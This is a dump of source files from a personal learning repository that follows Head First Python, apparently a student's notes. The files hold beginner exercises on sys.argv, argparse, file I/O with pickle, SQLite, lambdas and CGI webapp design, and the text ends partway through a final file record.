"avg_line_length": 28.926828384399414,
"blob_id": "d35d332c74e28f3f09674d6705f273dc105253c4",
"content_id": "b4d774c69e576edf0d266a424d68e4b8f5cef4a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1227,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 41,
"path": "/tutorial/basic-form-of-driver.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "import sys\n\nprint('Program started!')\nprint('Number of arguments: ', len(sys.argv), ' arguments.')\nprint('Argument List: ', str(sys.argv))\nprint('')\n\nif sys.argv[1] == 'bfs':\n\tprint(\"Breadth-First Search Algorithm working here...\")\n\tlist = sys.argv[2].split(',')\n\tprint(\"This is comma-separated list of integers : \" + str(list))\n\tprint(\"example: \")\n\tprint(\"list[0] : \" + list[0])\n\tprint(\"list[1] : \" + list[1])\n\nelif sys.argv[1] == 'dfs':\n\tprint(\"Depth-First Search Algorithm working here...\")\n\tlist = sys.argv[2].split(',')\n\tprint(\"This is comma-separated list of integers : \" + str(list))\n\tprint(\"example: \")\n\tprint(\"list[0] : \" + list[0])\n\tprint(\"list[1] : \" + list[1])\n\nelif sys.argv[1] == 'ast':\n\tprint(\"A-Star Search Algorithm working here...\")\n\tlist = sys.argv[2].split(',')\n\tprint(\"This is comma-separated list of integers : \" + str(list))\n\tprint(\"example: \")\n\tprint(\"list[0] : \" + list[0])\n\tprint(\"list[1] : \" + list[1])\n\nelif sys.argv[1] == 'ida':\n\tprint(\"IDA-Star Search Algorithm working here...\")\n\tlist = sys.argv[2].split(',')\n\tprint(\"This is comma-separated list of integers : \" + str(list))\n\tprint(\"example: \")\n\tprint(\"list[0] : \" + list[0])\n\tprint(\"list[1] : \" + list[1])\n\nprint('')\nprint(\"Program Finished!\")\n"
},
{
"alpha_fraction": 0.7065480947494507,
"alphanum_fraction": 0.7130153775215149,
"avg_line_length": 26.080291748046875,
"blob_id": "77a9026993ca566974a4d400f8b47c1a09682cd5",
"content_id": "d8be2b2f96ec28500b566321fc370de83fde9317",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3711,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 137,
"path": "/02-functions/functions.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Modules of functions\n\n# Modules let you organize your code for optimal sharing.\n# The distribution utilities let you share your modules with the world.\n\n# Modulea are everywhere.\n# A module is simply z text file that contains Python code.\n\n\"\"\" (triple quote) for multiple-line comments.\nThis is the standard way to include a multiple-line comment in your code.\n\"\"\"\n\n\n# Prepare your distribution\n\"\"\"\n1. begin by creating a folder for your module.\n2. create a file called \"setup.py\" in your new folder.\n\"\"\"\n\n# Build your distribution\n\"\"\"\n3. build a distribution file.\n\topen a terminal window within your nester folder and type a single command: $ python3 setup.py sdist\n4. install your distribution into your lacal copy of Python.\n\ttype this command: $ sudo python3 setup.py install\n5. then, your distribution is ready.\n\"\"\"\n\n# A quick review of your distribution\n\"\"\"\nAfter setup, These files and folders are all created for you by the distribution utilities.\n\"\"\"\n\n# Import a module to use it\n\"\"\"\nNow that your module is built, packaged as a distribution, and installed, let's see what's involved in using it.\nTo use a module, simply import it into your programs or import it into the IDLE shell:\n\timport nester\nThe import statement tells Python to include the nester.py module in your program.\n\nimport nester\ncast = ['Palin', 'Cleese','Idle', 'Jones', 'Gilliam', 'Chapman']\nprint_lol(cast)\n\"\"\"\n\n# But it didn't Work!\n\n# Python's modules implement namespaces\n\"\"\"\nAll code in Python is associated with a namespace.\nSo, instead of invoking the function as print_lol(cast) you need to qualify the name as nester.print_lol(cast).\n\nnester.print_lol(cast)\n\"\"\"\n\n# Register with the PyPI website\n# Upload your code to PyPI\n# Welcome to the PyPI community\n# With success comes responsibility\n\n# Before your write new code, think BIFs.\n\n# range() : Returns an iterator that generates numbers in a specified range on demand and as needed.\n\nimport pdb\n\nfor num in range(4):\n\tprint(num)\n\nmovies = [\"The Holy Grail\", 1975, \"Terry Jones & Terry Gilliam\", 91,\n\t\t\t\t\t\t[\"Graham Chapman\", [\"Michael Palin\", \"John Cleese\", \"Terry Gilliam\", \"Eric Idle\", \"Terry Jones\"]]]\nprint(movies)\n\n#pdb.set_trace()\n\"\"\"\ndef print_lol(the_list, level):\n\tfor each_item in the_list:\n\t\tif isinstance(each_item, list):\n\t\t\tprint_lol(each_item, level+1)\n\t\telse:\n\t\t\tfor tab_stop in range(level):\n\t\t\t\tprint(\"\\t\", end='')\n\t\t\tprint(each_item)\n\nprint_lol(movies, 0)\n\"\"\"\n\n# trace your code\n# Python Debugger - pdb\n# import pdb\n# pdb.set_trace() : this point is when trace is started.\n# n : step next (executed current line)\n# s : step in (move inside of current line of function)\n# run : if next set_trace() doesn't exist, finished debugging.\n\n# This url is pdb doc.\n# https://docs.python.org/3/library/pdb.html\n\n\n# Use optional arguments\n\n\"\"\"\nTo turn a required argument to a function into an optional argument, provide the argument with a default value.\nWhen no argument value is provided, the default value is used.\nWhen an argument value is provided, it is used instead of the default.\n\ndef print_lol(the_list, level=0):\n\tfor each_item in the_list:\n\t\tif isinstance(each_item, list):\n\t\t\tprint_lol(each_item, level+1)\n\t\telse:\n\t\t\tfor tab_stop in range(level):\n\t\t\t\tprint(\"\\t\", end='')\n\t\t\tprint(each_item)\n\nprint_lol(movies, 0)\nprint_lol(movies)\nprint_lol(movies, 5)\n\"\"\"\n\n\n# But, your API is still not right\n# Amend your module one last time to add a third argument to your function.\n\ndef print_lol(the_list, indent=False, level=0):\n\tfor each_item in the_list:\n\t\tif isinstance(each_item, list):\n\t\t\tprint_lol(each_item, indent, level+1)\n\t\telse:\n\t\t\tif indent:\n\t\t\t\tfor tab_stop in range(level):\n\t\t\t\t\tprint(\"\\t\", end='')\n\t\t\tprint(each_item)\n\nprint_lol(movies)\nprint_lol(movies, True)\nprint_lol(movies, True, 5)\n\n"
},
{
"alpha_fraction": 0.7364953756332397,
"alphanum_fraction": 0.7457180619239807,
"avg_line_length": 20.628570556640625,
"blob_id": "d1fba1ac3bcb07b4d246e905f7cd6215d18fb55c",
"content_id": "94ae1d0ca5f616fcee1928e773fc1a41ae6821dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 759,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 35,
"path": "/09-handle/database.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Database management system\n\n# Python includes SQLite\n\"\"\"\nThe python Database API provides a standard mechanism for programming a wide variery of database management systems,\nincluding SQLite.\n\t1. Connect\n\t2. Create\n\t3. Interact\n\t4. Commit & Rollback\n\t5. Close\n\"\"\"\n\n# Database API as Python code\n\"\"\"\nimport sqlite3\nconnection = sqlite3.connect('test.sqlite')\ncursor = connection.cursor()\ncursor.execute(\"\"\"SELECT DATE('NOW')\"\"\")\nconnection.commit()\nconnection.close()\n\"\"\"\n\n# Define your database schema\n\"\"\"\ncreate table athletes(\n\tid integer primary key autoincrement unique not null,\n\tname text not null,\n\tdob date not null)\n\ncreate table timing_data(\n\tathlete_id integer not null,\n\tvalue text not null,\n\tforeign key (athlete_id) references athletes)\n\"\"\"\n\n\n"
},
{
"alpha_fraction": 0.7630718946456909,
"alphanum_fraction": 0.766339898109436,
"avg_line_length": 49.95833206176758,
"blob_id": "f094d75c83bf19878503e85bacd5406125b5de15",
"content_id": "c393591f6d43aafbae06237f5d918cc78e42bf34",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1236,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 24,
"path": "/tutorial/data-structure.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Python Data Structure\n\n# What's the differences between Tuples and Lists?\n\"\"\"\nTuples are fixed size in nature whereas lists are dynamic.\nIn other words, a tuple is immutable whereas a list is mutable.\n\t1. You can't add elements to a tuple. Tuples have no append or extend method.\n\t2. You can't remove elements from a tuple. Tuples have no remove or pop method.\n\t3. You can find elements in a tuple, since this doesn’t change the tuple.\n\t4. You can also use the in operator to check if an element exists in the tuple.\n\"\"\"\n\n# So what are tuples good for?\n\"\"\"\nTuples are faster than lists.\nIf you’re defining a constant set of values and all you’re ever going to do with it is iterate through it, use a tuple instead of a list.\n\nIt makes your code safer if you “write-protect” data that doesn’t need to be changed.\nUsing a tuple instead of a list is like having an implied assert statement that shows this data is constant,\nand that special thought (and a specific function) is required to override that.\n\nSome tuples can be used as dictionary keys (specifically, tuples that contain immutable values like strings, numbers, and other tuples).\nLists can never be used as dictionary keys, because lists are not immutable.\n\"\"\"\n\n"
},
{
"alpha_fraction": 0.6712920665740967,
"alphanum_fraction": 0.6724295020103455,
"avg_line_length": 21.538461685180664,
"blob_id": "ece41bfa77185d0ab8576791b82907a9b9c3a6f0",
"content_id": "dcd706a1f54f61303287a0448fd122f3aa8a798e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4396,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 195,
"path": "/04-files/files.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Saving data to files\n\n\"\"\"\nman = []\nother = []\n\ntry:\n\tdata = open('sketch.txt')\n\tfor each_line in data:\n\t\ttry:\n\t\t\t(role, line_spoken) = each_line.split(':', 1)\n\t\t\tline_spoken = line_spoken.strip()\n\t\t\tif role == 'Man':\n\t\t\t\tman.append(line_spoken)\n\t\t\telif role == 'Other Man':\n\t\t\t\tother.append(line_spoken)\n\t\texcept ValueError:\n\t\t\tpass\n\tdata.close()\nexcept IOError:\n\tprint('The datafile is missing!')\n\nprint(man)\nprint(other)\n\"\"\"\n\n# Open your file in write mode\n\nout = open(\"data.out\", \"w\")\nprint(\"Norwegian Blues stun easily.\", file=out)\nout.close()\n\nman = []\nother = []\n\ntry:\n\tdata = open('sketch.txt')\n\tfor each_line in data:\n\t\ttry:\n\t\t\t(role, line_spoken) = each_line.split(':', 1)\n\t\t\tline_spoken = line_spoken.strip()\n\t\t\tif role == 'Man':\n\t\t\t\tman.append(line_spoken)\n\t\t\telif role == 'Other Man':\n\t\t\t\tother.append(line_spoken)\n\t\texcept ValueError:\n\t\t\tpass\n\tdata.close()\nexcept IOError:\n\tprint('The datafile is missing!')\n\n\"\"\"\ntry:\n\tman_data = open('man_data.txt', 'w')\n\tother_data = open('other_data.txt', 'w')\n\n\tprint(man, file=man_data)\n\tprint(other, file=other_data)\n\t\n\t# If Crash here!\n\t# blow two lines of code DON'T get to run.\t\n\tman_data.close()\n\tother_data.close()\n\nexcept IOError:\n\tprint('File Error!')\n\"\"\"\n\n# Files are left open after an exception!\n\n# Extend try with finally\n# when you have a situation where code must always run no matter what errors occurs,\n# add that code to your try statement's finally suite:\n\n\"\"\"\ntry:\n\tman_data = open('man_data.txt', 'w')\n\tother_data = open('other_data.txt', 'w')\n\n\tprint(man, file=man_data)\n\tprint(other, file=other_data)\n\nexcept IOError:\n\tprint('File Error!')\n\nfinally:\n\tif 'man_file' in locals():\n\t\tman_data.close()\n\tif 'other_file' in locals():\n\t\tother_data.close()\n\"\"\"\n\n\n# Knowing the type of error is not enough\n\n\"\"\"\ntry:\n\tdata = open('missing.txt')\n\tprint(data.readline(), end='')\nexcept IOError as err:\n\tprint('File error: ' + str(err))\nfinally:\n\tif 'data' in locals():\n\t\tdata.close()\n\"\"\"\n\n\n# Use with to work with files\n\ntry:\n\twith open('its.txt', \"w\") as data:\n\t\tprint(\"It's...\", file=data)\nexcept IOError as err:\n\tprint('File error: ' + str(err))\n\n# The with statement takes advantage of a Python technology called the context management protocol.\n\ntry:\n\twith open('man_data.txt', 'w') as man_data:\n\t\tprint(man, file=man_data)\n\t\n\twith open('other_data.txt', 'w') as other_data:\n\t\tprint(other, file=other_data)\n\nexcept IOError as err:\n\tprint('File Error: ' + str(err))\n\n\n# Defualt formats are unsuitable for files\n\n\"\"\"\nwith open('man_data.txt') as mdf:\n\tprint(mdf.readline())\n\"\"\"\n# no need to close your file, because 'with' does that for you.\n\n\n# Why not modify print_lol()?\n\nval = [\"ansxodbs\", \"rlawltn\", [\"mom\", \"dad\", [\"you\", \"and\", \"i\"]]]\n\nimport sys\ndef print_lol(the_list, indent=False, level=0, fh=sys.stdout):\n\tfor each_item in the_list:\n\t\tif isinstance(each_item, list):\n\t\t\tprint_lol(each_item, indent, level+1, fh)\n\t\telse:\n\t\t\tif indent:\n\t\t\t\tfor tab_stop in range(level):\n\t\t\t\t\tprint(\"\\t\", end='', file=fh)\n\t\t\tprint(each_item, file=fh)\n\n#print_lol(val, True, 0)\n\n\n# Pickle your data\n# Python ships with a standard library called pickle, which can save and load almost any Python data object, including lists.\n\n# Save with dump and restore with load\n\"\"\"\nusing pickle is straightforward: import the required module, then use dump() to save your data and, some time later,\nload() to restore it. The only requirement when working with pickled files is that they have to be opened in binary access mode:\n\"\"\"\n\nimport pickle\n\ntry:\n\twith open('man_data.txt', 'wb') as man_file:\n\t\tpickle.dump(man, man_file)\n\twith open('other_data.txt', 'wb') as other_file:\n\t\tpickle.dump(other, other_file)\nexcept IOError as err:\n\tprint('File error: ' + str(err))\nexcept pickle.PickleError as perr:\n\tprint('Pickling error: ' + str(perr))\n\nnew_man = []\nnew_other = []\n\ntry:\n\twith open('man_data.txt', 'rb') as man_file:\n\t\tnew_man = pickle.load(man_file)\n\twith open('other_data.txt', 'rb') as other_file:\n\t\tnew_other = pickle.load(other_file)\nexcept IOError as err:\n\tprint('File error: ' + str(err))\nexcept pickle.PickleError as perr:\n\tprint('Pickling error: ' + str(perr))\n\n#print_lol(new_man)\n#print_lol(new_other)\n\n# pickle really shines when you load some previously pickled data into another program.\n# And, of course, there's nothing to stop you from using pickle with nester.\n# After all, each module is designed to serve different purposes.\n\n"
},
{
"alpha_fraction": 0.7283950448036194,
"alphanum_fraction": 0.7283950448036194,
"avg_line_length": 25.66666603088379,
"blob_id": "64d9b257a27a4c396bef1b3ae7e66d883db2abae",
"content_id": "8a01393465d59033749ad560ef61ff52b79eb524",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 81,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 3,
"path": "/README.md",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Python\n\nLearn with [Head First Python](http://python.itcarlow.ie/index.html). \n"
},
{
"alpha_fraction": 0.7119463682174683,
"alphanum_fraction": 0.7155731320381165,
"avg_line_length": 37.388187408447266,
"blob_id": "2a5377a17d2859a6a55781eca71a7d5507e2932b",
"content_id": "51d1db0040f31a20f296d2a9384b191b52a81ae9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9127,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 237,
"path": "/tutorial/argparse_test.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "import argparse\n\n\"\"\" The basics\nparser = argparse.ArgumentParser()\nparser.parse_args()\n\"\"\"\n# The --help option, which can also be shortened to -h, is the only option we get for free.\n\n\"\"\" Introducing Positional arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"echo\") \nargs = parser.parse_args()\nprint(args.echo)\n\"\"\"\n# add_argument() method, which is what we use to specify which command-line options the program is willing to accept.\n# The parse_args() method actually returns some data from the options specified, in this case, echo.\n# The variable is some form of ‘magic’ that argparse performs for free (i.e. no need to specify which variable that value is stored in).\n# You will also notice that its name matches the string argument given to the method, echo.\n\n\"\"\" make it a bit more useful\nparser = argparse.ArgumentParser()\nparser.add_argument(\"echo\", help=\"echo the string you use here\")\nargs = parser.parse_args()\nprint(args.echo)\n\"\"\"\n\n\"\"\" doing something even more useful\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", help=\"display a square of a given number\")\nargs = parser.parse_args()\nprint(args.square**2)\n\"\"\"\n# It didn't go so well.\n# That's because argparse treats the options we give it as strings, unless we tell it otherwise.\n# So, let's tell argparse to treat that input as an integer.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", help=\"display a square of a given number\", type=int)\nargs = parser.parse_args()\nprint(args.square**2)\n\"\"\"\n\n\"\"\" Introducing Optional Arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--verbosity\", help=\"increase output verbosity\")\nargs = parser.parse_args()\nif args.verbosity:\n\tprint(\"Verbosity turned on\")\n\"\"\"\n# To show that the option is actually optional, there is no error when running the program without it.\n# Note that by default, if an optional argument isn’t used, the relevant variable, in this case args.verbosity, is given None as a value,\n# which is the reason it fails the truth test of the if statement.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--verbose\", help=\"increase output verbosity\", action=\"store_true\")\nargs = parser.parse_args()\nif args.verbose:\n\tprint(\"Verbosity turned on\")\n\"\"\"\n# The option is now more of a flag than something that requires a value.\n# We even changed the name of the option to match that idea.\n# Note that we now specify a new keyword, action, and give it the value \"store_true\".\n# This means that, if the option is specified, assign the value True to args.verbose. Not specifying it implies False.\n\n\"\"\" Short options\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", action=\"store_true\")\nargs = parser.parse_args()\nif args.verbose:\n\tprint(\"Verbosity turned on\")\n\"\"\"\n\n\"\"\" Combining Positional ans Optional arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", type=int, help=\"display a square of a given number\")\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", action=\"store_true\")\nargs = parser.parse_args()\nanswer = args.square**2\nif args.verbose:\n\tprint(\"The square of {} equals {}\".format(args.square, answer))\nelse:\n\tprint(answer)\n\"\"\"\n# Note that the order does not matter.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", type=int, help=\"display a square of a given number\")\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", type=int)\nargs = parser.parse_args()\nanswer = args.square**2\nif args.verbose == 2:\n\tprint(\"The square of {} equals {}\".format(args.square, answer))\nelif args.verbose == 1:\n\tprint(\"{}^2 = {}\".format(args.square, answer))\nelse:\n\tprint(answer)\n\"\"\"\n# Let's fix it by restricting the values the --verbosity option can accept.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", type=int, help=\"display a square of a given number\")\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", type=int, choices=[0,1,2])\nargs = parser.parse_args()\nanswer = args.square**2\nif args.verbose == 2:\n\tprint(\"The square of {} equals {}\".format(args.square, answer))\nelif args.verbose == 1:\n\tprint(\"{}^2 = {}\".format(args.square, answer))\nelse:\n\tprint(answer)\n\"\"\"\n# let’s use a different approach of playing with verbosity, which is pretty common.\n# It also matches the way the CPython executable handles its own verbosity argument.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", type=int, help=\"display a square of a given number\")\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", action=\"count\")\nargs = parser.parse_args()\nanswer = args.square**2\nif args.verbose == 2:\n\tprint(\"The square of {} equals {}\".format(args.square, answer))\nelif args.verbose == 1:\n\tprint(\"{}^2 = {}\".format(args.square, answer))\nelse:\n\tprint(answer)\n\"\"\"\n# Now here’s a demonstration of what the “count” action gives. You’ve probably seen this sort of usage before.\n# And if you don’t specify the -v flag, that flag is considered to have None value.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", type=int, help=\"display a square of a given number\")\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", action=\"count\")\nargs = parser.parse_args()\nanswer = args.square**2\n# bug fix: replace == with >=\nif args.verbose >= 2:\n\tprint(\"The square of {} equals {}\".format(args.square, answer))\nelif args.verbose >= 1:\n\tprint(\"{}^2 = {}\".format(args.square, answer))\nelse:\n\tprint(answer)\n\"\"\"\n# Third output not so good. add defualt keyword.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", type=int, help=\"display a square of a given number\")\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", action=\"count\", default=0)\nargs = parser.parse_args()\nanswer = args.square**2\nif args.verbose >= 2:\n\tprint(\"The square of {} equals {}\".format(args.square, answer))\nelif args.verbose >= 1:\n\tprint(\"{}^2 = {}\".format(args.square, answer))\nelse:\n\tprint(answer)\n\"\"\"\n# Remember that by default, if an optional argument isn't specified, it gets the None value, and that cannot be compared to an int value.\n# (hence the TypeError exception.)\n\n\"\"\" Getting a little more advanced\nparser = argparse.ArgumentParser()\nparser.add_argument(\"x\", type=int, help=\"the base\")\nparser.add_argument(\"y\", type=int, help=\"the exponent\")\nparser.add_argument(\"-v\", \"--verbose\", action=\"count\", default=0)\nargs = parser.parse_args()\nanswer = args.x**args.y\nif args.verbose >= 2:\n\tprint(\"{} to the power {} equals {}\".format(args.x, args.y, answer))\nelif args.verbose >= 1:\n\tprint(\"{}^{} = {}\".format(args.x, args.y, answer))\nelse:\n\tprint(answer)\n\"\"\"\n# Notice that so far we’ve been using verbosity level to change the text that gets displayed.\n# The following example instead uses verbosity level to display more text instead.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"x\", type=int, help=\"the base\")\nparser.add_argument(\"y\", type=int, help=\"the exponent\")\nparser.add_argument(\"-v\", \"--verbose\", action=\"count\", default=0)\nargs = parser.parse_args()\nanswer = args.x**args.y\nif args.verbose >= 2:\n\tprint(\"Running '{}\".format(__file__))\nif args.verbose >= 1:\n\tprint(\"{}^{} == \".format(args.x, args.y), end=\"\")\nprint(answer)\n\"\"\"\n\n# So far, we have been working with two methods of an argparse.ArgumentParser instance.\n# Let’s introduce a third one, add_mutually_exclusive_group(). It allows for us to specify options that conflict with each other.\n# Let’s also change the rest of the program so that the new functionality makes more sense:\n# we’ll introduce the --quiet option, which will be the opposite of the --verbose one:\n\"\"\" Conflicting options\nparser = argparse.ArgumentParser()\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument(\"-v\", \"--verbose\", action=\"store_true\")\ngroup.add_argument(\"-q\", \"--quiet\", action=\"store_true\")\nparser.add_argument(\"x\", type=int, help=\"the base\")\nparser.add_argument(\"y\", type=int, help=\"the exponent\")\nargs = parser.parse_args()\nanswer = args.x**args.y\nif args.quiet:\n\tprint(answer)\nelif args.verbose:\n\tprint(\"{} to the power {} equals {}\".format(args.x, args.y, answer))\nelse:\n\tprint(\"{}^{} == {}\".format(args.x, args.y, answer))\n\"\"\"\n# Before we conclude, you probably want to tell your users the main purpose of your program, just in case they don’t know.\n\nparser = argparse.ArgumentParser(description=\"Calculate X to the power of Y\")\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument(\"-v\", \"--verbose\", action=\"store_true\")\ngroup.add_argument(\"-q\", \"--quiet\", action=\"store_true\")\nparser.add_argument(\"x\", type=int, help=\"the base\")\nparser.add_argument(\"y\", type=int, help=\"the exponent\")\nargs = parser.parse_args()\nanswer = args.x**args.y\nif args.quiet:\n\tprint(answer)\nelif args.verbose:\n\tprint(\"{} to the power {} equals {}\".format(args.x, args.y, answer))\nelse:\n\tprint(\"{}^{} == {}\".format(args.x, args.y, answer))\n\n# Conclusion\n# The argparse module offers a lot more than shown here.\n# its docs are quite detailed and thorough, and full of examples.\n\n"
},
{
"alpha_fraction": 0.6684881448745728,
"alphanum_fraction": 0.6766848564147949,
"avg_line_length": 42.880001068115234,
"blob_id": "e543238148ce49a7e05d41947714bc6c557afed6",
"content_id": "c90c7bf5806df34c5eb5bae27f38aa3e275bb3a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1098,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 25,
"path": "/tutorial/command-line-argument.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "\n# Python provides a getopt module that helps you parse command-line options and arguments.\n# $ python test.py arg1 arg2 arg3\n\n# The Python sys module provides access to any command-line arguments via the sys.argv. This serves two purposes:\n# \t\t1. sys.argv is the list of command-line arguments.\n#\t\t\t2. len(sys.argv) is the number of command-line arguments.\n\nimport sys\n\nprint('Number of arguments: ', len(sys.argv), ' arguments.')\nprint('Argument List: ', str(sys.argv))\n\n# type into shell command like this:\n# $ python3 command-line-argument.py arg1 arg2 arg3\n\n# Note: As mentioned above, first argument is always script name and it is also being counted in number of arguments.\n\n\n# -------------------------------------------------------------------------------------------------------------------\n\n# These arguments are stored in the sys module's argv attribute as a list.\n# The getopt module processes sys.argv using the conventions of the Unix getopt() function.\n# More powerful and flexible command line processing is provided by the argparse module.\n\n# create getopt.py, argparse.py files.\n"
},
{
"alpha_fraction": 0.7591164112091064,
"alphanum_fraction": 0.763323962688446,
"avg_line_length": 40.92647171020508,
"blob_id": "13dd919b69298a9e88aef52fe15a5f7187a3190d",
"content_id": "0594af0f0a1c9b21f0f9a3244215d6432f751324",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2852,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 68,
"path": "/07-putitall/web.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Putting it all together\n\n# It's good to share.\n# You can put your program on the Web.\n# If you develop your program as a Web-based application (or webapp, for short), your program is:\n#\t\tAvailable to everyone who can get to your website\n#\t\tIn one place on your web server\n#\t\tEasy to update as new functionality is needed\n\n# Webapps up Close\n# web request, web response, Common Gateway Interface(CGI)\n\n# Design your webapp with MVC(Model-View-Controller)\n\n\"\"\"\nNow that you have an idea of the pages your webapp needs to provide, your next question should be: what's the best way to build this thing?\nDespite this, the general consensus is that great webapps conform to the Model-View-Controller pattern which helps you segment your webapp's code\ninto easily manageable functional chunks (or components):\n\tThe Model: The code to store(and sometiems process) your webapp's data\n\tThe View: The code to format and display your webapp's user interface(s)\n\tThe Controller: The code to glue your webapp together and provide its business logic\n\nBy following the MVC pattern, you build your webapp in such as way as to enable your webapp to grow as new requirements dictate.\nYou also open up the possibility of splitting the workload among a number of people, one for each component.\n\"\"\"\n\n# Model your data \n# make a athletemodel.py file.\n\n# View your interface\n# YATE folder download. and checking code.\n\n# Control your code\n# download webapp folder.\n# CGI lets your web server run programs.\n# Display the list of athletes.\n\"\"\"\nRecall that all of your CGI scripts nees to reside in the cgi-bin folder on your web server.\ncreating generate_list.py CGI script sends its data to another program called:\n\"\"\"\n\n# Test\n# $ python3 simple_httpd.py\n# check the url in http://localhost:8080\n\n# The dreaded 404 error!\n# The 404 error is exactly what you would expect to be displayed in this situation, so your generate_list.py CGI is working fine.\n# What's needed is the code to the other CGI script.\n\n# Create another CGI script\n# create generate_timing_data.py CGI script\n\n# Enable CGI tracking to help with errors\n# import cgitb\n# cgitb.enable()\n\n# A small change can make all the difference\n# @property - This decorator allows you to access the data returned by \"top3()\" as if it were a class attribute.\n# It's a small change, but it's an important one.\n\"\"\"\nwhen a change is made to the way a class is used, you need to be careful to consider what impact the change has on existing programs,\nboth yours ans those written by others.\n\nAt the moment, you are the only one using the AthleteList class, so it's not a big deal to fix this.\nBut imagine if thousands of programmers were using and relying on your code...\n\"\"\"\n\n# By conforming to the MVC pattern and using CGI, you've built a webapp in such a way that it's easy to extend as new requirements are identified.\n\n"
},
{
"alpha_fraction": 0.6450819969177246,
"alphanum_fraction": 0.6811475157737732,
"avg_line_length": 27.34883689880371,
"blob_id": "79f44533e25b081cef75faa28a8b0fbbf52acf3a",
"content_id": "e2eae43ebebd63d344bee520295df1d8f9fd9189",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1220,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 43,
"path": "/tutorial/lambda.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Lambdas \n\n# Lambda expressions (sometimes called lambda forms) are used to create anonymous functions.\n# The expression lambda arguments: expression yields a function object.\n# The unnamed object behaves like a function object defined with:\n# \tdef <lambda>(arguments):\n# \t\treturn expression\n\n# Using like this:\n# \tlambda <parameter_list>: expression\t\n\ndef hap(x, y):\n\treturn x+y\n\nprint(hap(10, 20))\n\nprint((lambda x,y: x+y)(10, 20))\n\n# map(func, list)\nmap(lambda x: x ** 2, range(5))\nprint(map(lambda x: x ** 2, range(5)))\nprint(list(map(lambda x: x**2, range(5))))\n\n# reduce(func, ordered data)\n# you must imort like this:\nfrom functools import reduce\nreduce(lambda x,y: x+y, [0, 1, 2, 3, 4])\nprint(reduce(lambda x,y: x+y, [0, 1, 2, 3, 4]))\n\n# testing this example\n# why this reduce func print 'edcba' ? explain it. \nreduce(lambda x,y: y+x, 'abcde')\nprint(reduce(lambda x,y: y+x, 'abcde'))\n\n# filter(func, list)\nfilter(lambda x: x<5, range(10))\nlist(filter(lambda x: x<5, range(10)))\nprint(list(filter(lambda x: x<5, range(10))))\n\n# creating func that returns odd number \nprint(list(filter(lambda x: x%2, range(10))))\nprint(list(filter(lambda x: x%2!=0, range(10))))\nprint(list(filter(lambda x: x%2==0, range(10))))\n\n"
},
{
"alpha_fraction": 0.7093425393104553,
"alphanum_fraction": 0.7093425393104553,
"avg_line_length": 25.272727966308594,
"blob_id": "ab5b6fdc4e0339c86d997cfd73f3b4e1d8a31e72",
"content_id": "0c84db179c022780eebc57245076e39e53f7b79e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 11,
"path": "/02-functions/nester.py",
"repo_name": "flyingbest/head-first-python",
